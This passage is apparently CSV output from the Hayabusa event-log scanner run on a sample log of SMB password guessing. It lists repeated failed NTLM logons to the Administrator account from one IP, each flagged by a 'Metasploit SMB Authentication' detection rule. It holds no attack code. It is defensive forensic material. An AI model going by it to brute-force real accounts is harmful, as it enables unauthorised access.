Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 